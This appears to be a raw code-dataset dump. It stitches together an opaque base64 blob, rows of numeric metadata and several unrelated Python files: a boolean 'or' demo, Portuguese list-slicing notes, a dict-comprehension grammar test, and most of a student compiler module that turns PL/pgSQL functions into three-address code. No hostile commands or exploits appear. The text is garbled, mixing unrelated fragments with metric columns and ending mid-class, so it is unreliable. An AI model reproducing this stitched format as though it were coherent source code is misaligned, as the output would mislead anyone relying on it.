EXb1Jlfv4uJ8A1z3O3/mZ53vSO/hIO8ZFjLCNwc83fondgq3l4VM7MaE3BcoTPlBN+fSzDtD7/Hbq3XYfuPS/Cd0wwM4O2H01y6TP56qraTTqJSoWvB97diTGdXdhn5lPtovHbPNBxUgxlIkgdgIewBRZztpl/ln5xfP1d3Fnj5e/gKbrdXyy2mbJvpN6cdat1y1KcGVbr+HzV+/rk1k+frdMPXWTN/1u1y8nyAZUha2T+3Pc81GmfB+h3YrfecdKVKDVBSR36biENMTxGLO3GdJe8AdyGxfYK4Efn9dvrcsDe3hnpXbdZR5wgW/IX4j0hkO4GCz3PbRQur3Oyd4axl2iaGXS+hRbukjDmPTi2YskvSXxov92Gaya8spWFl9hb0E/7/1b67O2+f7INu4Yn6joOJTR91EodP67fdLivi6n16peutit5vdtdHwiiv0jhfzUWiFStTzJh/v+cvs8oJS0+0KMF2K//ZatTJiinO+bifrTKNkkGpDGWlMv93KObytq6xew3NWidPV7+DY3i4I7AQtkFgUS3A1H7hZRctU4EpJrHUT33H6/d2eYHz+3//rF58PU2zv8pECI2T3t587pEW1w++n7QUR8e0yPxeTR7bUfin9CkTxs/u5WMQpddiWn4GoTL
[base64 payload (~60 KB) elided: obfuscated encoded data in the `content` field, no recoverable text] | 30,059 | 60,091 | 0.959114 | 2,339 | 60,118 | 24.651561 | 0.977768 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175394 | 0.000033 | 60,118 | 2 | 60,091 | 30,059 | 0.783751 | 0 | 0 | 0 | 0 | 0.5 | 0.998819 | 0.998819 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10
b8e38453845efc8da1a11645a3bedb0fa32b945e | 112 | py | Python | week04/code07.py | byeongal/KMUCP | 5bafe02c40aae67fc53d9e6cdcb727929368587e | [
"MIT"
] | null | null | null | week04/code07.py | byeongal/KMUCP | 5bafe02c40aae67fc53d9e6cdcb727929368587e | [
"MIT"
] | null | null | null | week04/code07.py | byeongal/KMUCP | 5bafe02c40aae67fc53d9e6cdcb727929368587e | [
"MIT"
] | 1 | 2019-11-27T20:28:19.000Z | 2019-11-27T20:28:19.000Z | print(False or False) # False
print(False or True) # True
print(True or False) # True
print(True or True) # True | 28 | 29 | 0.723214 | 20 | 112 | 4.05 | 0.2 | 0.246914 | 0.296296 | 0.37037 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.169643 | 112 | 4 | 30 | 28 | 0.870968 | 0.178571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
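The `or` truth table printed by `week04/code07.py` above follows from Python's short-circuit rule: `a or b` evaluates `a` first and returns it if truthy, otherwise evaluates and returns `b`. A minimal sketch of that behavior (the `noisy` helper and `log` list are illustrative, not part of the dataset file):

```python
# `or` returns the first truthy operand and skips the rest (short-circuit).
log = []

def noisy(value):
    log.append(value)      # record that this operand was actually evaluated
    return value

result = noisy(True) or noisy(False)
print(result)              # True; the second operand is never evaluated
print(log)                 # [True]

# With falsy operands, `or` returns the last operand unchanged,
# which is why it also works as a fallback/default idiom.
print(0 or "fallback")     # fallback
print(False or False)      # False
```

Note that `or` returns one of its operands as-is, not a coerced `bool`; the snippet in the dataset only prints `True`/`False` because its operands already are booleans.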
6202f765b3102973cee3e38b48f509b3a58d982c | 537 | py | Python | week_8/manipulacao_listas.py | angelitabrg/lih_lab_python | d524349331f3f977aec9c05cb26a6948a3f23d4d | [
"MIT"
] | null | null | null | week_8/manipulacao_listas.py | angelitabrg/lih_lab_python | d524349331f3f977aec9c05cb26a6948a3f23d4d | [
"MIT"
] | null | null | null | week_8/manipulacao_listas.py | angelitabrg/lih_lab_python | d524349331f3f977aec9c05cb26a6948a3f23d4d | [
"MIT"
] | null | null | null | # LIST SLICES:
primos = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
primos[1:2]
#[3]
primos[2:7]
#[5, 7, 11, 13, 17]
len(primos)
#25
primos[0:12]
#[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
primos[12:25]
#[41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
primos[:12]
#[2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]
primos[12:]
#[41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
final = primos[12:]
final
#[41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
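The slices above all use non-negative bounds; Python slices also accept negative indices and a step. A small sketch (reusing the same `primos` list) illustrating both:

```python
primos = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]
print(primos[-3:])     # last three primes: [83, 89, 97]
print(primos[::2])     # every second prime, starting at 2
print(primos[5:1:-1])  # reversed slice: [13, 11, 7, 5]
```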
| 15.342857 | 105 | 0.50838 | 121 | 537 | 2.256198 | 0.289256 | 0.029304 | 0.058608 | 0.087912 | 0.747253 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0.717949 | 0 | 0.468293 | 0.236499 | 537 | 34 | 106 | 15.794118 | 0.197561 | 0.528864 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62075dcd3ce7d7c703506424043176e8663426da | 117 | py | Python | Python/Tests/TestData/Grammar/DictComp.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 695 | 2019-05-06T23:49:37.000Z | 2022-03-30T01:56:00.000Z | Python/Tests/TestData/Grammar/DictComp.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 1,672 | 2019-05-06T21:09:38.000Z | 2022-03-31T23:16:04.000Z | Python/Tests/TestData/Grammar/DictComp.py | techkey/PTVS | 8355e67eedd8e915ca49bd38a2f36172696fd903 | [
"Apache-2.0"
] | 186 | 2019-05-13T03:17:37.000Z | 2022-03-31T16:24:05.000Z | {fob:oar for fob,oar in baz}
{fob:oar for fob,oar in baz if quox}
{fob:oar for fob,oar in baz for quox in Exception}
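The grammar fixtures above use unbound names (`fob`, `oar`, `baz`), so they parse but cannot run. A runnable sketch of the same three comprehension shapes, with hypothetical concrete data:

```python
baz = [(1, 'a'), (2, 'b'), (3, 'c')]
quox = True
print({fob: oar for fob, oar in baz})             # plain dict comprehension
print({fob: oar for fob, oar in baz if quox})     # with a guard clause
print({fob: oar for fob, oar in baz for q in 'x'})  # nested for clause
```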
| 29.25 | 50 | 0.717949 | 27 | 117 | 3.111111 | 0.296296 | 0.428571 | 0.321429 | 0.428571 | 0.714286 | 0.714286 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 117 | 3 | 51 | 39 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
62407ea1b4a474def9c62fa68ae9667379a0ed49 | 62,646 | py | Python | parser/fase2/team24/procedural.py | Yosoyfr/tytus | 0df7e656835a93458462e476f7ab858a33baa2e0 | [
"MIT"
] | null | null | null | parser/fase2/team24/procedural.py | Yosoyfr/tytus | 0df7e656835a93458462e476f7ab858a33baa2e0 | [
"MIT"
] | null | null | null | parser/fase2/team24/procedural.py | Yosoyfr/tytus | 0df7e656835a93458462e476f7ab858a33baa2e0 | [
"MIT"
] | 4 | 2020-12-19T17:12:13.000Z | 2021-01-07T20:29:53.000Z | import hashlib
from datetime import date
from variables import tabla as ts
from variables import NombreDB
from variables import cont as ncont
import tablaDGA as TAS
import mathtrig as mt
import reportError as errores
#from Interfaz import lista
funciones = []
objopt = []
cont = ncont
class pl():
    'Abstract class'
def deleteF(name):
    name = name + '():'
    for i in range(len(funciones)):
        x = funciones[i].split(" ")
        # only remove the entry whose 'def <name>():' header matches
        if x[1].startswith(name):
            print('tengo que eliminar la posicion ' + str(i) + ' ya que elimine ' + str(x[1]))
            funciones.pop(i)
            break
class declaration(pl):
def __init__(self,id,constant,tipo,collate,notnull,exp):
self.id = id
self.constant = constant
self.tipo = tipo
self.collate = collate
self.notnull = notnull
self.exp = exp
self.traduccion = None
def c3d(self):
if self.traduccion == None:
if self.exp == None:
self.traduccion = 'a'
else:
self.traduccion =self.exp.traducir()
c3d = ''
if self.traduccion == 'a':
valor = 'None'
else:
if isinstance(self.traduccion[2],str):
valor = '\''+str(self.traduccion[2])+'\''
else:
valor = str(self.traduccion[2])
if self.collate == None:
col = 'None'
else:
col = self.collate
        # Every scalar type emits the same symbol-table registration code;
        # only the TAS.TIPO member changes.  (The original NUMERIC branch
        # mistakenly wrote 'tabla.agregar' instead of 'ts.agregar'.)
        tipos = ('SMALLINT', 'INTEGER', 'BIGINT', 'DECIMAL', 'NUMERIC', 'REAL',
                 'DOUBLE_PRECISION', 'DOUBLE', 'CHARACTER', 'CHARACTER_VARYING',
                 'TEXT', 'TIMESTAMP')
        if self.tipo in tipos:
            c3d += '\tambitoFuncion = ts.buscarIDF()\n'
            c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+str(self.id)+'\',TAS.TIPO.'+self.tipo+',ambitoFuncion,None, None, None, None, None, None, None ,None,None,'+valor+', '+col+','+str(self.notnull)+','+str(self.constant)+')\n'
            c3d += '\tts.agregar(NuevoSimbolo)\n'
            c3d += '\tcont+=1\n'
        return c3d
def traducir(self):
c3d = ''
        if self.traduccion == None and self.exp != None:
            self.traduccion = self.exp.traducir()
        # Numeric types default to 0 and text types to '' when there is no
        # initializer; otherwise emit the expression's code followed by the
        # assignment.  (The original per-type branches called
        # self.exp.traducir without parentheses, which would concatenate a
        # bound method instead of its result.)
        numericos = ('SMALLINT', 'INTEGER', 'BIGINT', 'DECIMAL', 'NUMERIC',
                     'REAL', 'DOUBLE', 'PRECISION')
        textuales = ('CHARACTER', 'CHARACTER_VARYING', 'TEXT', 'TIMESTAMP')
        if self.tipo in numericos or self.tipo in textuales:
            if self.exp == None:
                default = '0' if self.tipo in numericos else '\'\' '
                c3d += str(self.id) + ' = ' + default
            else:
                c3d += self.traduccion[0]  # code that runs before the assignment
                c3d += str(self.id) + ' = ' + str(self.traduccion[1])  # final temporary or literal value
        return c3d
return c3d
def ejecutar(self):
global cont
ambitoFuncion = ts.buscarIDF()
#ambitoFuncion = ts.buscarIDF()
if self.traduccion == None:
if self.exp == None:
self.traduccion = 'a'
else:
self.traduccion =self.exp.traducir()
if self.traduccion == 'a':
valor = 'None'
else:
valor = str(self.traduccion[2])
        tipo = self.tipo.upper()
        enteros = ('SMALLINT', 'INTEGER', 'BIGINT')
        reales = ('DECIMAL', 'NUMERIC', 'REAL', 'DOUBLE', 'PRECISION')
        textuales = ('CHARACTER', 'CHARACTER_VARYING', 'TEXT', 'TIMESTAMP')
        if tipo in enteros + reales + textuales:
            if valor == 'None':
                # default value per type family
                valor = 0 if tipo in enteros else 0.0 if tipo in reales else ''
            # getattr avoids one branch per type; the original
            # CHARACTER_VARYING branch referenced the misspelled member
            # TAS.TIPO.CHARACTER_VARING.
            NuevoSimbolo = TAS.Simbolo(cont, self.id, getattr(TAS.TIPO, tipo), ambitoFuncion, None, None, None, None, None, None, None, None, None, valor, self.collate, self.notnull)
            ts.agregar(NuevoSimbolo)
            cont += 1
class expre(pl):
def __init__(self,tipo, exp):
self.tipo = tipo
self.exp = exp
def traducir(self):
return self.exp.traducir()
def ejecutar(self):
pass
class llamadaP(pl):
def __init__(self,id,lparams) -> None:
self.id = id
self.lparams = lparams
def traducir(self):
if not ts.existeF(str(self.id)):
print('Funcion '+str(self.id) +' no existe')
e = errores.CError(0,0,"Error en llamada de proceso, no existe",'Semantico')
errores.insert_error(e)
return '\tprint( \'Funcion '+ str(self.id) + ' no existe\')\n'
c3d = ''
contadorP = 0
for expresion in self.lparams:
trad = expresion.traducir()
c3d += trad[0] +'\n'
            c3d += 'pila[' + str(contadorP) + '] = ' + str(trad[1]) + '\n'
contadorP +=1
c3d += '\t'+self.id+'()\n'
return c3d
def c3d(self):
return '\n'
def ejecutar(self):
pass
class llamadaF(pl):
def __init__(self,id,lparams) -> None:
self.id = id
self.lparams = lparams
def traducir(self):
if not ts.existeF(str(self.id)):
e = errores.CError(0,0,"Error en llamada de funcion, no existe",'Semantico')
errores.insert_error(e)
print('Funcion '+str(self.id) +' no existe')
return '\tprint( \'Funcion '+ str(self.id) + 'no existe\')\n'
c3d = ''
contadorP = 0
for expresion in self.lparams:
trad = expresion.traducir()
c3d += trad[0] +'\n'
c3d += 'pila['+str(contadorP)+'] = ' + str(trad[1]) + '\n'
contadorP +=1
tmp = getTemp()
c3d += self.id+'()'
c3d += '\n'
c3d += tmp +' = pila[10]\n'
return c3d,tmp,0
    def c3d(self):
return '\n'
def ejecutar(self):
pass
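# llamadaF and llamadaP emit calls that pass arguments through a global
# `pila` array and read the return value from slot 10.  A standalone sketch
# of that calling convention (the names here are illustrative, not the
# project's actual runtime):

```python
pila = [None] * 11  # slots 0-9: parameters, slot 10: return value

def suma():
    # translated function body: read parameters, write result to pila[10]
    a = pila[0]
    b = pila[1]
    pila[10] = a + b

# call site, as the generated code would do it
pila[0] = 3
pila[1] = 4
suma()
resultado = pila[10]
print(resultado)  # 7
```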
class dropfunc(pl):
def __init__(self,ids) -> None:
self.ids = ids
def traducir(self):
c3d = ''
self.ejecutar()
for identificador in self.ids:
c3d += '\tts.deleteFP(str(\''+identificador+'\'))\n'
if not ts.existeF(str(identificador)):
e = errores.CError(0,0,"Error drop funcion, "+str(identificador)+" no existe como funcion",'Semantico')
errores.insert_error(e)
return c3d
def ejecutar(self):
for identificador in self.ids:
if ts.existeF(str(identificador)):
deleteF(str(identificador))
ts.deleteFP(str(identificador))
class createfunc(pl):
def __init__(self,id,lparams,returntype,block):
self.id = id
self.lparams = lparams
self.returntype = returntype
self.block = block
def ejecutar(self):
return 'Se creo la funcion o procedimiento'
def traducir(self):
global cont
if ts.existeF(str(self.id)):
print('Funcion '+str(self.id) +' ya existe')
e = errores.CError(0,0,"Error en llamada creacion de funcion/proceso, ya existe",'Semantico')
errores.insert_error(e)
return '\tprint( \'Funcion '+ str(self.id) + ' ya existe\')\n'
c3d = ''
c3d += '\tn_db = ts.buscarIDTB(NombreDB)\n'
c3d += '\tNuevoSimbolo = TAS.Simbolo(cont,\''+self.id+'\',TAS.TIPO.FUNCTION,n_db)\n'
c3d += '\tts.agregar(NuevoSimbolo)\n'
c3d += '\tcont+=1\n'
ambito = ts.buscarIDTB(NombreDB)
NuevoSimbolo = TAS.Simbolo(cont,self.id,TAS.TIPO.FUNCTION,ambito,None, None, None, None, None, None, None ,None,None,None, None,None)
ts.agregar(NuevoSimbolo)
cont += 1
        # create the function in the symbol table
funcion = ''
funcion += 'def '+self.id+'():\n'
        # variables to use: store them in the symbol table and emit their declarations
if self.block.declare != None:
for decla in self.block.declare:
decla.ejecutar()
c3d += decla.c3d()+'\n'
funcion += '\t'+decla.traducir()+'\n'
pcont = 0
for param in self.lparams:
            # parameter variables
            if param.alias == None:
                # no alias: pull the name from the declarations
for declara in self.block.declare:
if pcont == declara.tipo:
funcion += '\t'+declara.id+' = pila['+str(pcont)+']\n'
else:
                # alias given: read straight from the numbered stack slot
funcion += '\t'+param.alias+' = pila['+str(pcont)+']\n'
param.ejecutar()
pcont += 1
for inst in self.block.instrucciones:
funcion += '\t'+str(inst.traducir()).replace('\n','\n\t')+'\n'
c3d += inst.c3d()
inst.ejecutar()
funciones.append(funcion)
return c3d
def ejecutar1(self):
c3d = ''
c3d += '\tbuscarIDF = buscarIDTB(NombreDB)\n'
c3d += '\tNuevoSimbolo = Simbolo(cont,\''+self.id+'\',TAS.TIPO.FUNCTION,buscarIDF)\n'
c3d += '\tcont+=1\n'
funcion = ''
funcion += 'def '+self.id+'():\n'
        # variables to use: store them in the symbol table and emit their declarations
for decla in self.block.declare:
c3d += decla.c3d()+'\n'
funcion += '\t'+decla.traducir()+'\n'
for inst in self.block.instrucciones:
funcion += '\t'+inst.traducir()+'\n'
funciones.append(funcion)
return c3d
class param(pl):
def __init__(self,alias,tipo) -> None:
self.alias = alias
self.tipo = tipo
def traducir(self):
c3d = str(self.alias)
return c3d
def ejecutar(self):
global cont
#ambitoDB = ts.buscarIDDB(NombreDB)
ambitoFuncion = ts.buscarIDF()
valor = 'None'
        tipo = self.tipo.upper()
        enteros = ('SMALLINT', 'INTEGER', 'BIGINT')
        reales = ('DECIMAL', 'NUMERIC', 'REAL', 'DOUBLE', 'PRECISION')
        textuales = ('CHARACTER', 'CHARACTER_VARYING', 'TEXT', 'TIMESTAMP')
        if tipo in enteros + reales + textuales:
            if valor == 'None':
                # default value per type family
                valor = 0 if tipo in enteros else 0.0 if tipo in reales else ''
            NuevoSimbolo = TAS.Simbolo(cont, self.alias, getattr(TAS.TIPO, tipo), ambitoFuncion, None, None, None, None, None, None, None, None, None, valor)
            ts.agregar(NuevoSimbolo)
            cont += 1
class block(pl):
def __init__(self,declare,instrucciones) -> None:
self.instrucciones = instrucciones
self.declare = declare
def traducir(self):
return '\n'
def c3d(self):
return '\n'
def ejecutar(self):
pass
class instruccion():
    'Abstract class'
class raisenotice(instruccion):
def __init__(self,texto,variable) -> None:
self.texto = texto
self.variable = variable
    def traducir(self):
        c3d = ''
        if self.variable == None:
            c3d += 'print(\''+self.texto+'\')'
        else:
            trad = self.variable.exp.traducir()
            c3d += str(trad[0])
            c3d += 'print(f\'' + str(self.texto).replace('%', '{' + trad[1] + '}') + '\')'
        return c3d
def c3d(self):
return '\n'
def ejecutar(self):
pass
class asignacion(instruccion):
def __init__(self,id,exp) -> None:
self.id = id
self.exp = exp
self.traduccion = None
def ejecutar(self):
if self.traduccion == None:
self.traduccion =self.exp.traducir()
#print(self.id,self.traduccion[2])
ts.modificar_valor(self.id,self.traduccion[2])
def c3d(self):
if self.traduccion == None:
self.traduccion =self.exp.traducir()
c3d = ''
#c3d += str(self.exp.traducir()[0])
if isinstance(self.traduccion[2],str):
valor = '\''+str(self.traduccion[2])+'\''
else:
valor = str(self.traduccion[2])
c3d += '\tts.modificar_valor(\''+ str(self.id) + '\', ' + valor +')\n'
return c3d
def traducir(self):
if self.traduccion == None:
self.traduccion =self.exp.traducir()
var = self.traduccion
c3d = ''
c3d += var[0]+ '\n'
obj = self.id + ' = ' + str(var[1]) + '\n'
objopt.append(obj)
c3d += self.id + ' = ' + str(var[1]) + '\n'
return c3d
class rtrn(instruccion):
def __init__(self,exp) -> None:
self.exp = exp
def traducir(self):
c3d = ''
var = self.exp.traducir()
c3d += var[0]
c3d += '\n'
obj = 'pila[10] = ' + var[1] + '\n'
objopt.append(obj)
c3d += 'pila[10] = ' + var[1] + '\n'
return c3d
def c3d(self):
return '\n'
def ejecutar(self):
pass
class searched_case(instruccion):
def __init__(self,condition,instrucciones,elsif,els) -> None:
        self.condition = condition
self.instrucciones = instrucciones
self.elsif = elsif
self.els= els
    def traducir(self):
        c3d = ''
        varcon = self.condition.traducir()
        c3d += varcon[0]
        # temporaries used by the ELSIF conditions are emitted first
        aveli = []
        for eli in self.elsif:
            veli = eli.condition.traducir()
            aveli.append(veli)
            c3d += str(veli[0])
        c3d += 'if ' + varcon[1] + ':\n'
        for inst in self.instrucciones:
            c3d += '\t' + inst.traducir() + '\n'
        contadori = 0
        for eli in self.elsif:
            # emit each ELSIF branch
            c3d += 'elif ' + aveli[contadori][1] + ' :\n'
            for inst in eli.instrucciones:
                c3d += '\t' + inst.traducir() + '\n'
            contadori += 1
        if self.els != None:
            c3d += 'else:\n'
            for inst in self.els.instrucciones:
                c3d += '\t' + inst.traducir() + '\n'
        return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
for eli in self.elsif:
c3d += eli.c3d()
        if self.els != None:
            c3d += self.els.c3d()
return c3d
def ejecutar(self):
pass
class iff(instruccion):
def __init__(self,condition,instrucciones,elsif,els) -> None:
self.condition = condition
self.instrucciones = instrucciones
self.elsif = elsif
self.els= els
def traducir(self):
c3d = ''
varcon = self.condition.traducir()
c3d += varcon[0]+'\n'
        # temporaries used by the ELSIF conditions are emitted first
aveli = []
for eli in self.elsif :
veli = eli.condition.traducir()
aveli.append(veli)
c3d += veli[0]+'\n'
c3d += 'if '+ varcon[1] +':\n'
obj = 'if '+ varcon[1] +':\n'
objopt.append(obj)
for inst in self.instrucciones:
c3d += '\t'+inst.traducir().replace('\n','\n\t')+'\n'
contadori = 0
for eli in self.elsif :
            # emit each ELSIF branch
c3d += 'elif '+ aveli[contadori][1] +' :\n'
obj = 'elif '+ aveli[contadori][1] +' :\n'
objopt.append(obj)
for inst in eli.instrucciones:
c3d += '\t'+inst.traducir().replace('\n','\n\t')+'\n'
contadori += 1
if self.els != None:
c3d += 'else:\n'
objopt.append('else:')
for inst in self.els.instrucciones:
c3d += '\t'+inst.traducir().replace('\n','\n\t')+'\n'
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
for eli in self.elsif:
c3d += eli.c3d()
if self.els != None:
c3d += self.els.c3d()
return c3d
def ejecutar(self):
pass
class els(instruccion):
def __init__(self,instrucciones) -> None:
self.instrucciones = instrucciones
def traducir(self):
c3d = ''
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
return c3d
def ejecutar(self):
pass
class elsif(instruccion):
def __init__(self,condition,instrucciones) -> None:
self.condition = condition
self.instrucciones = instrucciones
def traducir(self):
c3d = ''
return c3d
def c3d(self):
c3d = ''
for inst in self.instrucciones:
c3d += inst.c3d()
return c3d
def ejecutar(self):
pass
class expresion():
    'Abstract class'
tempcont = 0
def getTemp():
global tempcont
tempcont += 1
return 't'+str(tempcont-1)
import OptimizarObjetos as oo
class exp_boolp(expresion):
    'This expression returns a boolean'
def __init__(self, val):
self.val = val
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = {self.val}'
valor = tmp
res = self.val
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
def ejecutar(self):
pass
class exp_textp(expresion):
    'Returns the text'
def __init__(self, val):
self.val = val
def ejecutar(self):
pass
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = \'{self.val}\''
valor = tmp
res = self.val
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_nump(expresion):
    'Returns a number'
def __init__(self, val):
self.val = val
def ejecutar(self):
pass
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = {self.val}'
valor = tmp
res = float(self.val)
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class expresionC:
    'Abstract class for the operations'
class exp_sumap(expresionC):
    'Adds the two expressions'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} + {tmp2}'
c3df += f'\n{tmpf}'
codigo = c3df
valor = tmp
res = res1 + res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'+')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
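# Each binary-expression class returns a (codigo, valor, res) triple and
# chains the sub-expressions' code before its own temporary assignment.  A
# self-contained sketch of that pattern, reduced to numbers and addition
# (class names here are illustrative, not the module's real ones):

```python
tempcont = 0

def getTemp():
    global tempcont
    tempcont += 1
    return 't' + str(tempcont - 1)

class Num:
    def __init__(self, val):
        self.val = val
    def traducir(self):
        # literal: one temporary assignment, the computed value travels along
        tmp = getTemp()
        return tmp + f' = {self.val}', tmp, float(self.val)

class Suma:
    def __init__(self, e1, e2):
        self.e1, self.e2 = e1, e2
    def traducir(self):
        c1, t1, r1 = self.e1.traducir()
        c2, t2, r2 = self.e2.traducir()
        tmp = getTemp()
        # concatenate operand code, then the new three-address instruction
        return c1 + '\n' + c2 + f'\n{tmp} = {t1} + {t2}', tmp, r1 + r2

codigo, valor, res = Suma(Num(2), Num(3)).traducir()
print(codigo)
```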
class exp_restap(expresion):
    'Subtracts the two expressions'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} - {tmp2}'
c3df += f'\n{tmpf}'
codigo = c3df
valor = tmp
res = res1 - res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'-')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_multiplicacionp(expresion):
    'Multiplies the two expressions'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} * {tmp2}'
c3df += f'\n{tmpf}'
codigo = c3df
valor = tmp
res = res1 * res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'*')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_divisionp(expresion):
    'Divides the two expressions'
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} / {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
res = res1 / res2
obj = oo.Asignacion(tmp,tmp1,tmp2,'/')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_idp(expresion):
def __init__(self,val):
self.val = val
def ejecutar(self):
pass
def traducir(self):
tmp = getTemp()
codigo = tmp + f' = {self.val}\n'
valor = tmp
print(ts.getVariable(self.val))
res = ts.getVariable(self.val)
obj = oo.Asignacion(tmp,self.val,None,None)
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_mayorp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def ejecutar(self):
pass
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} > {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 > res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'>')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_menorp(expresion):
def __init__(self, exp1, exp2):
self.exp1 = exp1
self.exp2 = exp2
def traducir(self):
tr1 = self.exp1.traducir()
tr2 = self.exp2.traducir()
c3d1 = tr1[0]
c3d2 = tr2[0]
tmp1 = tr1[1]
tmp2 = tr2[1]
res1 = tr1[2]
res2 = tr2[2]
c3df = c3d1 + '\n' + c3d2
tmp = getTemp()
tmpf = f'{tmp} = {tmp1} < {tmp2}'
c3df += f'\n{tmpf}\n'
codigo = c3df
valor = tmp
#res = res1 < res2
res = True
obj = oo.Asignacion(tmp,tmp1,tmp2,'<')
objopt.append(obj)
#print(codigo,valor)
return codigo,valor,res
class exp_igualp(expresion):
